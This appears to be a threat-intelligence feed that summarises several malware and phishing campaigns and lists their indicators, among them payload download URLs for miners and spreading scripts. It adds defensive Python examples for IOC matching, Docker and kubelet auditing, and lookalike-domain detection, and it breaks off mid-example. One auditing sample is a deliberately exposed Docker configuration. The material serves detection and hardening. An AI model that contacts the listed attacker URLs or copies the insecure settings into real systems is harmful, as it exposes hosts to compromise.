FileHash-SHA256 | a05d053174b52a9b158a5ec841c1a7633b9368c4ac2da371a11a9364f8a8dc60
FileHash-SHA256 | ace33243994a9da0797601bdd4191e25967a1da2644f0d0b530e26c71854d5d9
FileHash-SHA256 | b29ed89e0428ba476459adabb5630c8d29f7fee5905c5de10d792fe3a02e52a6
FileHash-SHA256 | ed6775184051ef36c3049e24167471ab42bd4301e99631c8423d4d753cdad455
FileHash-SHA256 | fda71a7de6d473826465bb83210107501e66a5d96e533772444b3b24806286fd
URL | https://206.188.197.113/

WalletConnect Scam: A Case Study in Crypto Drainer Tactics
An investigation uncovered a malicious app on Google Play targeting mobile users to steal cryptocurrency. The app, posing as a legitimate WalletConnect tool, used evasion techniques that kept it undetected for nearly five months, and reached over 10,000 downloads through fake reviews and branding. The attackers combined social engineering with a modern crypto drainer toolkit, stealing approximately $70,000 from over 150 victims. The malware, identified as MS Drainer, supports multiple blockchains and uses a range of methods to drain user wallets. The case highlights the growing sophistication of cybercriminal tactics in decentralized finance and the need for vigilance among users and stronger vetting in app stores.

Type | Indicator
--- | ---
FileHash-SHA256 | 42330ccaaacea8a18794c7e9fad100de31ea415bff7821e407b9ac70ef690032
FileHash-SHA256 | bf557e975733c113acc38daa18ca1849a1022b4c30b118899f68210cd3c7f990
FileHash-SHA256 | ea526792150e71402f896ddaf1f04aedcb1356aea3bfebbcaf6c90bcdde7aa0c
domain | cakeserver.online
domain | mestoxcalculator.com
domain | web3protocol.online

HZ Rat backdoor for macOS harvests data from WeChat and DingTalk
A macOS version of the HZ Rat backdoor that targets users of China's WeChat and DingTalk was uploaded to VirusTotal in July 2023 and, according to Kaspersky's research, was not detected by any vendor at the time.

Type | Indicator
--- | ---
FileHash-MD5 | 0c3201d0743c63075b18023bb8071e73
FileHash-MD5 | 287ccbf005667b263e0e8a1ccfb8daec
FileHash-MD5 | 6cc838049ece4fcb36386b7a3032171f
FileHash-MD5 | 6d478c7f94d95981eb4b6508844050a6
FileHash-MD5 | 7005c9c6e2502992017f1ffc8ef8a9b9
FileHash-MD5 | 7355e0790c111a59af377babedee9018
FileHash-MD5 | 7a66cd84e2d007664a66679e86832202
FileHash-MD5 | 7ed3fc831922733d70fb08da7a244224
FileHash-MD5 | 8d33f667ca135a88f5bf77a0fab209d4
FileHash-MD5 | 9cdb61a758afd9a893add4cef5608914
FileHash-MD5 | a5af0471e31e5b11fd4d3671501dfc32
FileHash-MD5 | da07b0608195a2d5481ad6de3cc6f195
FileHash-MD5 | dd71b279a0bf618bbe9bb5d934ce9caa

SilentSelfie: Revealing a major campaign against Kurdish websites
A large-scale cyber espionage campaign targeting Kurdish websites was uncovered, involving 25 compromised sites and four variants of malicious scripts. The attacks ranged from simple location tracking to prompting users to install malicious Android apps. Despite lacking sophisticated techniques, the campaign's scale and duration were notable: it operated undetected since late 2022. The compromised sites were linked to Kurdish media, political organizations, and the Rojava administration in Syria. A malicious Android app disguised as a news app, capable of exfiltrating user data, was also discovered. Attribution remains uncertain; potential actors include Turkish intelligence, the Syrian government, and the Kurdistan Regional Government of Iraq.

Type | Indicator
--- | ---
FileHash-MD5 | 7ff9e87f8c8ea10e6aa688c491c81283
FileHash-SHA1 | 6c75d5f31fe386a1ec94b85cfb7f873b2e100062
FileHash-SHA256 | 2d75110d4c227c59b9c8fb02cc54b99d0b41e33a2fe1ad50e2fdf0cfb1e701d5
IPv4 | 170.75.161.102
IPv4 | 23.95.14.63
IPv4 | 24.246.223.228
URL | http://170.75.161.102/asd.js
URL | http://rojnews.news/wp-includes/sitemaps/
URL | http://ronahi.video/wo_cookie.php
URL | http://ronahi.video/wo_cookies.php
URL | http://webmail.onlinearuba.net/7b2[redacted]600a/logs.php
URL | https://rojnews.news/ku/wp-content/mobile.html
URL | https://targetplatform.net/mobile.html
domain | ciwanensoresger.com
domain | dicle.fm
domain | dirbesiye.fm
domain | halkin-dg.com
domain | hbdh.info
domain | init4afrin.org
domain | kongra-star.org
domain | leftkup.com
domain | lekolin.org
domain | nuceciwan129.xyz
domain | orkesfm.com
domain | pajk.org
domain | ronahi.net
domain | ronahi.video
domain | sdf-press.com
domain | sehidenrojava.com
domain | star-fm.net
domain | targetplatform.net
domain | tev-dem.com
domain | thkp-c.org
domain | ypj-office.com
domain | ypjrojava.net
domain | yra-ufm.com
domain | zindi24.com
hostname | webmail.onlinearuba.net
YARA | fd8e25d1e0865fc8a7fb33fa1797fa1a4f4ce88e
YARA | 936ac199159f316087973a74e1fe9b155868ae83
YARA | 02a8dd33b54ec801ad073001e2d384ee9da98dbb
YARA | d4f3cad0a5fb11f974b37c1d2b8b3a1db46205f5
YARA | 23c7b8bd11b06151c643982dc7fb5a34278c46ec
YARA | e1e6e66c027890b03eccd00c4730f61fdb3d3c6d
YARA | 21af2ccd18add5f947bbd0684012b63e58beb4a1

European Banks Already Under Attack by New Malware Variant
A new version of the Octo malware, named Octo2, has emerged as a significant threat to European banks. This variant builds on the capabilities of its predecessor, already a dominant force in mobile malware. Octo2 features improved remote access capabilities, stronger obfuscation, and a Domain Generation Algorithm (DGA) for reaching its command and control servers. Initial campaigns have been observed in Italy, Poland, Moldova, and Hungary, targeting banking applications. The malware's developers have focused on making Device Takeover attacks more stable and on anti-detection measures. With the original Octo source code leaked, Octo2 represents an escalation in the mobile threat landscape, posing increased risk to mobile banking worldwide.

Type | Indicator
--- | ---
FileHash-MD5 | 11cb1b221952268fcd6000e563752d79
FileHash-MD5 | c508d432e3d521acaa6215934f609b2a
FileHash-MD5 | e32eeea3676874431571f976d044a816
FileHash-SHA1 | 5e44ba99e81c6673b000519755e041c2d4082ae8
FileHash-SHA1 | d40169c63e74d86cc0d02c638401bcd9ccdb621b
FileHash-SHA1 | d4a85997999a975848b60fd52597538baf652daf
FileHash-SHA256 | 117aa133d19ea84a4de87128f16384ae0477f3ee9dd3e43037e102d7039c79d9
FileHash-SHA256 | 6cd0fbfb088a95b239e42d139e27354abeb08c6788b6083962943522a870cb98
FileHash-SHA256 | 83eea636c3f04ff1b46963680eb4bac7177e77bbc40b0d3426f5cf66a0c647ae

BlackSuit Ransomware |
The report meticulously chronicles a sophisticated intrusion which began in December 2023 and culminated in the deployment of BlackSuit ransomware approximately 15 days later. The threat actor demonstrated an array of tactics, leveraging tools like Cobalt Strike, Sharphound, and SystemBC, alongside built-in Windows utilities, to establish a persistent foothold, exfiltrate data, and ultimately encrypt systems for financial gain. The investigation revealed the use of various obfuscation techniques, including process injection, proxy servers, and malleable command-and-control infrastructure, highlighting the actor's determination to evade detection. |
Type |
Indicator |
FileHash-MD5 |
0bb61c0cff022e73b7c29dd6f1ccf0e2 |
FileHash-MD5 |
1b2b0fc8f126084d18c48b4f458c798b |
FileHash-MD5 |
3900ebc7766f3894fb1eb300460376ad |
FileHash-MD5 |
3bf1142b3294c23852852053135ec0df |
FileHash-MD5 |
519dc779533b4ff0fc67727fecadba82 |
FileHash-MD5 |
6015e6e85d0d93e60041fa68c6a89776 |
FileHash-MD5 |
76a2363d509cc7174c4abee9a7d7ae68 |
FileHash-MD5 |
820cfde780306e759bb434da509f7a91 |
FileHash-MD5 |
b54240c98ca23202e58a1580135ad14c |
FileHash-MD5 |
bed5688a4a2b5ea6984115b458755e90 |
FileHash-MD5 |
d66000edfed0a9938162b2b453ffa516 |
FileHash-MD5 |
ecc488e51fbb2e01a7aac2b35d5f10bd |
FileHash-MD5 |
ed44877077716103973cbbebd531f38e |
FileHash-MD5 |
f34d5f2d4577ed6d9ceec516c1f5a744 |
FileHash-SHA1 |
286588a50b9b128d07aa0f8851f2d7ee91dfa372 |
FileHash-SHA1 |
2bb6c8b6461edc49e22f3d0c7dc45904b2ed8a2b |
FileHash-SHA1 |
4e38b98965a4d4756e6f4a8259df62cbca7de559 |
FileHash-SHA1 |
586ea19ea4776300962e20cfc9e7017a50888ecb |
FileHash-SHA1 |
8dde03600a18a819b080a41effc24f42fa960a3e |
FileHash-SHA1 |
a3b617eb4248aba34c28c48886116ac97e55e932 |
FileHash-SHA1 |
cd55256904f1964b90b51089b46f1a933fec3e8e |
FileHash-SHA1 |
ceb8c699a57193aa3be2a1766b03050cde3c738a |
FileHash-SHA1 |
e63732fb38d2e823348529a264b4c4718e0c0b4a |
FileHash-SHA256 |
27e300fa67828d8ffd72d0325c6957ff54d2dc6a060bbf6fc7aa5965513468e0 |
FileHash-SHA256 |
3b873bc8c7ee12fe879ab175d439b5968c8803fbb92e414de39176e2371896b2 |
FileHash-SHA256 |
55cde638e9bcc335c79c605a564419819abf5d569c128b95b005b2f48ccc43c1 |
FileHash-SHA256 |
60dcbfb30802e7f4c37c9cdfc04ddb411060918d19e5b309a5be6b4a73c8b18a |
FileHash-SHA256 |
6c884e4a9962441155af0ac8e7eea4ac84b1a8e71faee0beafc4dd95c4e4753f |
FileHash-SHA256 |
9493b512d7d15510ebee5b300c55b67f9f2ff1dda64bddc99ba8ba5024113300 |
FileHash-SHA256 |
a39dc30bd672b66dc400f4633dfa4bdd289b5e79909c2e25e9c08b44d99b8953 |
FileHash-SHA256 |
e92912153cf82e70d52203a1a5c996e68b7753818c831ac7415aedbe6f3f007d |
FileHash-SHA256 |
f474241a5d082500be84a62f013bc2ac5cde7f18b50bf9bb127e52bf282fffbf |
domain |
svchorst.com |
hostname |
as.regsvcast.com |
hostname |
qw.regsvcast.com |
hostname |
wq.regsvcast.com |
hostname |
zx.regsvcast.com |
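The indicator lists on this page arrive as one cell per line, and a domain indicator should match any subdomain while a hostname indicator matches exactly. The following added example (not code from the report) parses that layout and runs the result over constructed DNS log lines; the excerpt copies a few BlackSuit indicators from the list above, and the log format is an assumption.

```python
import re

# Constructed excerpt in the flattened "Type | Indicator" layout used on this page;
# the values are copied from the BlackSuit list above for illustration.
FEED_EXCERPT = """\
Type |
Indicator |
FileHash-SHA256 |
f474241a5d082500be84a62f013bc2ac5cde7f18b50bf9bb127e52bf282fffbf |
domain |
svchorst.com |
hostname |
as.regsvcast.com |
hostname |
qw.regsvcast.com |
"""

def parse_feed(text):
    """Parse the one-cell-per-line layout into {indicator_type: set(values)}."""
    cells = [line.strip().rstrip("|").strip() for line in text.splitlines()]
    cells = [c for c in cells if c]
    if cells[:2] == ["Type", "Indicator"]:
        cells = cells[2:]
    if len(cells) % 2:
        raise ValueError("odd number of cells: feed is truncated or misaligned")
    iocs = {}
    for typ, val in zip(cells[0::2], cells[1::2]):
        iocs.setdefault(typ, set()).add(val.lower())
    return iocs

def match_dns(iocs, queried_name):
    """'hostname' indicators match exactly; 'domain' indicators also match any
    subdomain. Returns the matching indicator, or None."""
    name = queried_name.lower().rstrip(".")
    if name in iocs.get("hostname", set()):
        return name
    for dom in iocs.get("domain", set()):
        if name == dom or name.endswith("." + dom):
            return dom
    return None

def match_hash(iocs, hashes):
    """hashes: {'sha256': ..., 'md5': ...}; returns the first value present in the feed."""
    for algo, value in hashes.items():
        if value.lower() in iocs.get(f"FileHash-{algo.upper()}", set()):
            return value.lower()
    return None

QUERY_RE = re.compile(r"query=(\S+)")

def scan_dns_log(iocs, lines):
    """(queried_name, matched_indicator) pairs for DNS log lines carrying a query= field."""
    hits = []
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            ind = match_dns(iocs, m.group(1))
            if ind:
                hits.append((m.group(1).lower(), ind))
    return hits

# Constructed log lines, not from the report.
SAMPLE_DNS_LOG = [
    "2023-12-20T01:02:03Z client=10.1.2.3 query=beacon.svchorst.com type=A",
    "2023-12-20T01:02:04Z client=10.1.2.3 query=as.regsvcast.com type=A",
    "2023-12-20T01:02:05Z client=10.1.2.3 query=zz.regsvcast.com type=A",
    "2023-12-20T01:02:06Z client=10.1.2.3 query=notsvchorst.com type=A",
]

if __name__ == "__main__":
    print(scan_dns_log(parse_feed(FEED_EXCERPT), SAMPLE_DNS_LOG))
```

Note what the third sample line shows: the feed lists specific regsvcast.com hostnames, not the parent domain, so a new subdomain such as zz.regsvcast.com is missed. Promoting the parent to a domain indicator is a judgement call for the analyst; the code deliberately does not do it on its own.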
|
Analysis of the BlackJack group: techniques, tools, and similarities with Twelve |
The report examines the BlackJack hacktivist group, which targets Russian organizations, focusing on its tools, techniques, and links to the Twelve group. BlackJack relies on freely available software such as the Shamoon wiper and LockBit ransomware. Significant overlaps with Twelve include near-identical malware samples, identical file paths, and shared tactics: both groups stage malware on network directories and execute it through scheduled tasks. The analysis points to a single cluster of hacktivist activity against Russian targets that has no financial motive and instead aims for maximum damage through encryption, deletion, and theft of data. |
Type |
Indicator |
FileHash-MD5 |
39b91f5dfbbec13a3ec7cce670cf69ad |
FileHash-MD5 |
5f88a76f52b470dc8e72bba56f7d7bb2 |
FileHash-MD5 |
646a228c774409c285c256a8faa49bde |
FileHash-MD5 |
bf402251745df3f065ebe2ffdec9a777 |
FileHash-MD5 |
da30f54a3a14ad17957c88bf638d3436 |
FileHash-MD5 |
ed5815ddad8188c198e0e52114173cb6 |
FileHash-SHA1 |
19ec859708e58b1275ee1bdb48aa1966757266d0 |
FileHash-SHA256 |
535e0dbd97cb9ea66f375400b550dd3bcad0788a89fb46996a651053a2df07c3 |
|
Threat Actors leverage Docker Swarm and Kubernetes to mine cryptocurrency at scale |
A new cryptojacking campaign targeting the Docker Engine API has been discovered that can also move laterally to Docker Swarm, Kubernetes, and SSH servers. The attackers use exposed Docker API endpoints to deploy cryptocurrency miners and additional payloads, host malicious images on Docker Hub, and abuse Docker Swarm's orchestration features for command and control. Lateral movement, persistence, and evasion rely on manipulating Docker Swarm, abusing the Kubernetes kubelet API, and installing backdoors. Some indicators suggest a link to TeamTNT, but the evidence is insufficient for definitive attribution. |
Type |
Indicator |
URL |
http://45.9.148.35/aws |
IPv4 |
164.68.106.96 |
FileHash-MD5 |
e10e3934d7659e00cc7f47b569af9ff5 |
FileHash-SHA1 |
02b71d23d5b26008dfb54a52fc3160b9e7f1296c |
FileHash-SHA256 |
c5391314ce789ff28195858a126c8a10a4f9216e8bd1a8ef71d11c85c4f5175c |
FileHash-MD5 |
154c26c9ddc84930f2acd899cd182916 |
FileHash-MD5 |
b62ce36054a7e024376b98df7911a5a7 |
FileHash-SHA1 |
efc0142857d1d8ee454286fb1b4587dad6762e0c |
FileHash-SHA256 |
0af1b8cd042b6e2972c8ef43d98c0a0642047ec89493d315909629bcf185dffd |
FileHash-SHA256 |
2514e5233c512803eff99d4e16821ecc3b80cd5983e743fb25aa1bcc17c77c79 |
FileHash-SHA256 |
505237e566b9e8f4a83edbe45986bbe0e893c1ca4c5837c97c6c4700cfa0930a |
FileHash-SHA256 |
6157a74926cfd66b959d036b1725a63c704b76af33f59591c15fbf85917f76fa |
FileHash-SHA256 |
6f426065e502e40da89bbc8295e9ca039f28b50e531b33293cee1928fd971936 |
FileHash-SHA256 |
700635abe402248ccf3ca339195b53701d989adb6e34c014b92909a2a1d5a0ff |
FileHash-SHA256 |
78ebc26741fc6bba0781c6743c0a3d3d296613cc8a2bce56ef46d9bf603c7264 |
FileHash-SHA256 |
9d02707b895728b4229abd863aa6967d67cd8ce302b30dbcd946959e719842ad |
FileHash-SHA256 |
d99bd3a62188213894684d8f9b4f39dbf1453cc7707bac7f7b8f484d113534b0 |
FileHash-SHA256 |
e4c4400a4317a193f49c0c53888ec2f27e20b276c2e6ee1a5fd6eacf3f2a0214 |
FileHash-SHA256 |
e6985878b938bd1fba3e9ddf097ba1419ff6d77c3026abdd621504f5c4186441 |
IPv4 |
192.155.94.199 |
IPv4 |
45.9.148.35 |
URL |
http://192.155.94.199/sh/xmr.sh.sh |
URL |
http://solscan.live/bin/zgrab |
URL |
http://solscan.live/chimaera/sh/init.sh |
URL |
http://solscan.live/sh/init.sh |
URL |
https://solscan.live/aws.sh |
URL |
https://solscan.live/bin/64bit/xmrig |
URL |
https://solscan.live/bin/pnscan_1.12+git20180612.orig.tar.gz |
URL |
https://solscan.live/bin/xmr/x86_64 |
URL |
https://solscan.live/bin/xmrig |
URL |
https://solscan.live/data/docker.container.local.spread.txt |
URL |
https://solscan.live/scan_threads.dat |
URL |
https://solscan.live/sh/init.sh |
URL |
https://solscan.live/sh/kube.lateral.sh |
URL |
https://solscan.live/sh/search.sh |
URL |
https://solscan.live/sh/setup_xmr.sh |
URL |
https://solscan.live/sh/spread_docker_local.sh |
URL |
https://solscan.live/sh/spread_kube_loop.sh |
URL |
https://solscan.live/sh/spread_ssh.sh |
URL |
https://solscan.live/sh/xmr.sh.sh |
URL |
https://solscan.live/so/xmrig.so |
URL |
https://solscan.live/upload.php |
domain |
borg.wtf |
domain |
solscan.live |
hostname |
x.solscan.live |
URL |
https://solscan.live/up/kube_in.php |
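The initial access here is a Docker Engine API reachable over plain TCP, and the spreading scripts (spread_kube_loop.sh, kube.lateral.sh) go on to abuse kubelets that accept anonymous callers. The following added example (not from the report) audits the two configurations that make that possible: a Docker daemon.json with a weak setting beside its hardened form, and a kubelet command line. The file contents, certificate paths and the kubelet flag defaults assumed when a flag is absent are all illustrative assumptions.

```python
import json
import shlex

# Constructed daemon.json contents (not taken from the report). The weak one exposes the
# Engine API on every interface without TLS; the hardened one binds to one address and
# requires client certificates. Certificate paths are placeholders.
WEAK_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"],
})
HARDENED_DAEMON_JSON = json.dumps({
    "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
    "tlsverify": True,
    "tlscacert": "/etc/docker/ca.pem",
    "tlscert": "/etc/docker/server-cert.pem",
    "tlskey": "/etc/docker/server-key.pem",
})

def audit_docker_daemon(config_text):
    """Findings for a daemon.json. An unauthenticated TCP listener is root on the
    host: anyone who reaches it can start a privileged container with / mounted."""
    cfg = json.loads(config_text)
    findings = []
    for host in cfg.get("hosts", []):
        if not host.startswith("tcp://"):
            continue
        addr = host[len("tcp://"):]
        if addr.startswith(("0.0.0.0", "[::]", ":")):
            findings.append(f"{host}: API listens on all interfaces")
        if not cfg.get("tlsverify"):
            findings.append(f"{host}: TCP listener without tlsverify (no client authentication)")
        elif not all(cfg.get(k) for k in ("tlscacert", "tlscert", "tlskey")):
            findings.append(f"{host}: tlsverify set but CA/cert/key paths incomplete")
    return findings

def audit_kubelet_cmdline(cmdline):
    """Flag kubelet flags that leave the kubelet API open to anonymous callers.
    Assumption: when a flag is absent the flag defaults apply (--anonymous-auth=true,
    --authorization-mode=AlwaysAllow); a kubelet config file may override these.
    --read-only-port is only judged when it is set explicitly."""
    args = shlex.split(cmdline)
    flags = {}
    i = 0
    while i < len(args):
        a = args[i]
        if a.startswith("--"):
            key, eq, val = a.partition("=")
            if not eq and i + 1 < len(args) and not args[i + 1].startswith("--"):
                val = args[i + 1]       # "--flag value" form
                i += 1
            flags[key] = val
        i += 1
    findings = []
    if flags.get("--anonymous-auth", "true").lower() != "false":
        findings.append("--anonymous-auth is not false: unauthenticated kubelet API access")
    if flags.get("--authorization-mode", "AlwaysAllow") == "AlwaysAllow":
        findings.append("--authorization-mode is AlwaysAllow: any caller may exec into pods")
    if flags.get("--read-only-port", "0") not in ("0", ""):
        findings.append(f"--read-only-port={flags['--read-only-port']}: unauthenticated read-only API")
    return findings

if __name__ == "__main__":
    print(audit_docker_daemon(WEAK_DAEMON_JSON))
    print(audit_kubelet_cmdline("/usr/bin/kubelet --anonymous-auth=true --authorization-mode=AlwaysAllow"))
```

The point of the daemon check is that Docker has no authentication of its own: either the socket stays local, or every TCP listener carries tlsverify with a CA the daemon trusts. The kubelet check covers the two switches the lateral-movement scripts depend on; on clusters configured through a kubelet config file, read the same keys (authentication.anonymous.enabled, authorization.mode) from that file instead.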
|
Iranian backed group steps up phishing campaigns against Israel, U.S. |
An Iranian government-backed threat group known as APT42 has significantly intensified its phishing campaigns targeting high-profile individuals in Israel and the United States over the past six months. The group, associated with Iran's Islamic Revolutionary Guard Corps, has focused on current and former government officials, political campaigns, diplomats, think tanks, NGOs, and academic institutions involved in foreign policy discussions. APT42's activities demonstrate a concerted effort to rapidly shift its operational priorities in line with Iran's political and military objectives. |
Type |
Indicator |
FileHash-MD5 |
157284a93f3c5f488f4559db3537daea |
FileHash-MD5 |
1cea34e748cc43cdc7724684cebf409f |
FileHash-MD5 |
39556dc87f9a24405e73e6dd46d34bc7 |
FileHash-MD5 |
6c033c2cbeff71f7d17be4628c7e59f5 |
FileHash-MD5 |
b6f02f67e2b5d2c81bc502d24258a1d5 |
FileHash-SHA1 |
5a892c6cf26f90220d279d878206bf73f933f4dc |
FileHash-SHA1 |
7e564f5f6bb98f629789565a737738ea66330f74 |
FileHash-SHA1 |
ca06b5b530c5c9fc09b12b1c8c48f8aeca4c3452 |
FileHash-SHA1 |
cce4761750a2549dc5bb7e377717dd4ea40420e5 |
FileHash-SHA1 |
e8ce99f3b7c5163fc8ab793a7dcfbe2cdf1a21a7 |
FileHash-SHA256 |
0180f4f29c550aa1ffaa21af51711b29de99fb1d7c932d008a0e9356ae8a7d60 |
FileHash-SHA256 |
33a61ff123713da26f45b399a9828e29ad25fbda7e8994c954d714375ef92156 |
FileHash-SHA256 |
4ac088bf25d153ec2b9402377695b15a28019dc8087d98bd34e10fed3424125f |
FileHash-SHA256 |
82ae2eb470a5a16ca39ec84b387294eaa3ae82e5ada4b252470c1281e1f31c0a |
FileHash-SHA256 |
89c1d1b61d7f863f8a651726e29f2ae3de7958f36b49a756069021817947d06c |
FileHash-SHA256 |
baac058ddfc96c8aea8c0057077505f0ad3ff20311d999886fed549924404849 |
FileHash-SHA256 |
bc2597ce09987022ff0498c6710a9b51a1a47ed8082ac044be2838b384157527 |
FileHash-SHA256 |
c3486133783379e13ed37c45dc6645cbee4c1c6e62e7988722931eef99c8eaf3 |
FileHash-SHA256 |
c67cd544a112cab1bb75b3c44df4caf2045ef0af51de9ece11261d6c504add32 |
FileHash-SHA256 |
f83e2b3be2e6db20806a4b9b216edc7508fa81ce60bf59436d53d3ae435b6060 |
URL |
http://check-pabnel-status.live/Gcollection/Password |
URL |
http://check-pabnel-status.live/Gcollection/Ref/CkliPwaM |
URL |
http://check-pabnel-status.live/Lcollection/Password |
URL |
http://check-pabnel-status.live/Lcollection/Ref/F53OQQkE |
URL |
http://checking-paneling.live/aliasauthG/Password |
URL |
http://checking-paneling.live/aliasauthG/autoref/vNSX6c2m |
URL |
http://click-choose-figured.cfd/Gallery/Password |
URL |
http://click-choose-figured.cfd/Gallery/Ref/FSaEM5gG |
URL |
http://panel-short-check.live/PhyfkFQX |
URL |
http://panel-short-check.live/ZZqt3LYD |
URL |
http://s3api.shop/api/ |
URL |
http://sharedrive.webredirect.org/Khn/shoaGzA/cGNt/dMPaV/kvvhK |
URL |
http://short-ion-per.live/08EFNZ1 |
URL |
http://smaaaal.cfd/Wp59tqKU |
domain |
accredit-navigation.online |
domain |
brookings.email |
domain |
check-pabnel-status.live |
domain |
checking-paneling.live |
domain |
click-choose-figured.cfd |
domain |
panel-short-check.live |
domain |
s3api.shop |
domain |
short-ion-per.live |
domain |
smaaaal.cfd |
domain |
understandingthewar.org |
hostname |
sharedrive.webredirect.org |
hostname |
visioneditor.loseyourip.com |
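Two of the domains above imitate the organisations APT42 targets: brookings.email reuses the Brookings label under another TLD, and understandingthewar.org inserts a word into the Institute for the Study of War's domain. The following added example (not code from the report) flags such lookalikes against a short protected list using edit distance; the protected list is an assumed set of legitimate domains chosen for illustration, and brookings-login.xyz is a constructed control.

```python
def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert/delete/substitute cost 1 (single-row DP)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def split_domain(domain: str):
    """(registrable label, tld). Assumption: no public-suffix list, so 'a.co.uk' -> ('co', 'uk')."""
    parts = domain.lower().strip(".").split(".")
    return (parts[-2], parts[-1]) if len(parts) >= 2 else (parts[0], "")

# Assumed legitimate domains of organisations the lures impersonate (illustrative list).
PROTECTED = ["brookings.edu", "understandingwar.org"]

def lookalike_of(candidate, protected=PROTECTED, min_similarity=0.8):
    """(legit_domain, reason) if candidate imitates a protected domain, else None."""
    c_label, c_tld = split_domain(candidate)
    for legit in protected:
        l_label, l_tld = split_domain(legit)
        if c_label == l_label:
            if c_tld != l_tld:
                return legit, "same label, different TLD"
            continue                      # the legitimate domain itself
        sim = 1 - levenshtein(c_label, l_label) / max(len(c_label), len(l_label))
        if sim >= min_similarity:
            return legit, f"label similarity {sim:.2f}"
        # legitimate label kept whole inside a hyphenated name, e.g. brookings-login.xyz
        if l_label in c_label.split("-"):
            return legit, "legitimate label embedded in hyphenated name"
    return None

def triage_domains(domains, protected=PROTECTED):
    """(domain, legit_domain, reason) for every lookalike in the input list."""
    return [(d, *hit) for d in domains if (hit := lookalike_of(d, protected))]

# Two indicators from the list above plus constructed controls.
CANDIDATES = [
    "brookings.email",
    "understandingthewar.org",
    "brookings.edu",
    "example.org",
    "brookings-login.xyz",
]

if __name__ == "__main__":
    for row in triage_domains(CANDIDATES):
        print(row)
```

Run this over newly registered domains or proxy logs rather than over an IOC list, where the value lies: the feed tells you about check-pabnel-status.live only after the fact, while the similarity test catches the next variant of a brand the actor keeps imitating. Keep the threshold high; at 0.8 a 19-character label tolerates three edits, which already admits some unrelated words.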
|
Investigating Infrastructure and Tactics of Phishing-as-a-Service Platform Sniper Dz |
Unit 42 examines Sniper Dz, a popular phishing-as-a-service (PhaaS) platform aimed at social media and online service accounts. More than 140,000 phishing websites tied to Sniper Dz were identified over the past year. The platform provides an admin panel with a catalog of phishing pages that users can either host on Sniper Dz infrastructure or download as templates. The service is free, most likely because Sniper Dz collects the stolen credentials itself. It hides phishing content behind public proxy servers, obfuscates its code, and routes credential exfiltration and victim tracking through centralized infrastructure. Sniper Dz abuses legitimate SaaS platforms, particularly Blogspot, and builds hostnames from brand names or trending keywords. After credentials are stolen, victims may be redirected to malicious advertisements or potentially unwanted applications. |
Type |
Indicator |
URL |
http://proxymesh.com/web/index.php |
URL |
http://raviral.com/host_style/style/js-track/track.js |
URL |
http://raviral.com/k_fac.php |
domain |
raviral.com |
hostname |
pro.riccardomalisano.com |
URL |
http://pro.riccardomalisano.com/about/z1to.html |
URL |
http://pro.riccardomalisano.com/about/z2to.html |
|
Security Brief: Actor Uses Compromised Accounts, Customized Social Engineering to Target Transport and Logistics Firms with Malware |
A threat actor is targeting transportation and logistics companies in North America with malware campaigns. The actor uses compromised email accounts to inject malicious content into existing conversations, making messages appear legitimate. Campaigns primarily deliver Lumma Stealer, StealC, NetSupport, DanaBot, and Arechclient2 malware. The actor employs Google Drive URLs, .URL files, and SMB for malware delivery, and recently adopted the 'ClickFix' technique. Campaigns are small-scale and highly targeted, with lures impersonating industry-specific software. The activity is believed to be financially motivated and aligns with a trend of sophisticated social engineering combined with commodity malware use in the cybercriminal landscape. |
Type |
Indicator |
FileHash-MD5 |
1ce8e7f90707058eec8757de0deaa76e |
FileHash-MD5 |
6bc398dba59c8d162ee858b7b199f81d |
FileHash-SHA1 |
6fdb6f50f4ad693c64b72a76a970fc93916b3655 |
FileHash-SHA1 |
d2e45018a2428d8b7729a75836499a4f55cdbcdf |
FileHash-SHA256 |
0931217eb498b677e2558fd30d92169cc824914c2df68cfbcff4f642600e2cc2 |
FileHash-SHA256 |
163dccdcaa7fdde864573f2aabe0b9cb3fdcdc6785f422f5c2ee71ae6c0e413a |
FileHash-SHA256 |
199d6f70f10c259ee09e99e6f1d7f127426999a0ed20536f2662842cd12b5431 |
FileHash-SHA256 |
1a002631b9b2e685aeb51e8b6f4409daf9bc0159cfd54ef9ad3ba69d651ac2a3 |
FileHash-SHA256 |
2436fe37d25712b68b2e1a9805825bcf5073efb91588c1b5193ba446d1edd319 |
FileHash-SHA256 |
37f328fc723b2ddf0e7a20b57257cdb29fe9286cb4ffeaac9253cb3b86520235 |
FileHash-SHA256 |
582c69b52d68b513f2a137bbf14704df7d787b06752333fc31066669cd663d04 |
FileHash-SHA256 |
8fe96fb9d820db0072fe0423c13d2d05f81a9cf0fdd6f4e2ee78dc4ca1d37618 |
FileHash-SHA256 |
957fe77d04e04ff69fdaff8ef60ac0de24c9eb5e6186b3187460eac6be561f5d |
FileHash-SHA256 |
ac49ff207e319f79bbd9c80d044d621920d1340f4c53e5e4da39b2a0c758634e |
FileHash-SHA256 |
b94bcdf5d6b9f1eb6abe97090993e8c4f66b514dd9c51193f16673e842253d86 |
FileHash-SHA256 |
cdf160c63f61ae834670fdaf040411511dc2fc0246292603e7aa8cd742d78013 |
FileHash-SHA256 |
d45b6b04ac18ef566ac0ecdaf6a1f73d1c3164a845b83e0899c66c608154b93d |
FileHash-SHA256 |
e5ed1a273faf5174dbd8db9d6d3657b81dc2cbc2e0af28cfe76f41c3d2f2fc37 |
FileHash-SHA256 |
e7526dadae6b589b6a31f1f7e2e528ed1c9edd9f3d1ca88f0ece0dee349d3842 |
FileHash-SHA256 |
f8b12e6d02ea5914e01f95b5665b3a735acfbb9ee6ae27b004af37547bc11e7f |
FileHash-SHA256 |
fddacfe9e490250e62f7f30b944fcbe122e87547d01c4a906401049304c395f7 |
IPv4 |
185.217.197.84 |
IPv4 |
89.23.98.98 |
domain |
ambccm.com |
domain |
ambcrrm.com |
domain |
idessit.com |
domain |
live-samsaratrucking.com |
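One of the delivery paths above is a .URL (Internet Shortcut) file whose target lives on an attacker SMB share, so opening it fetches the next stage over SMB and leaks an NTLM authentication on the way. The following added example (not code from the report) parses a constructed .URL file and flags every field that points at a remote UNC location; the host address is a documentation placeholder.

```python
import configparser
import re

# Constructed Internet Shortcut (.URL) file; the IP address is a documentation placeholder.
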